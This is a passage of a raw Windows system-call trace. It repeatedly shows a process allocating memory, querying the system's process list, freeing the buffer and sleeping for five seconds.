RegionSize=0xdea54*=0x20000) returned 0x0 [0245.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.896] 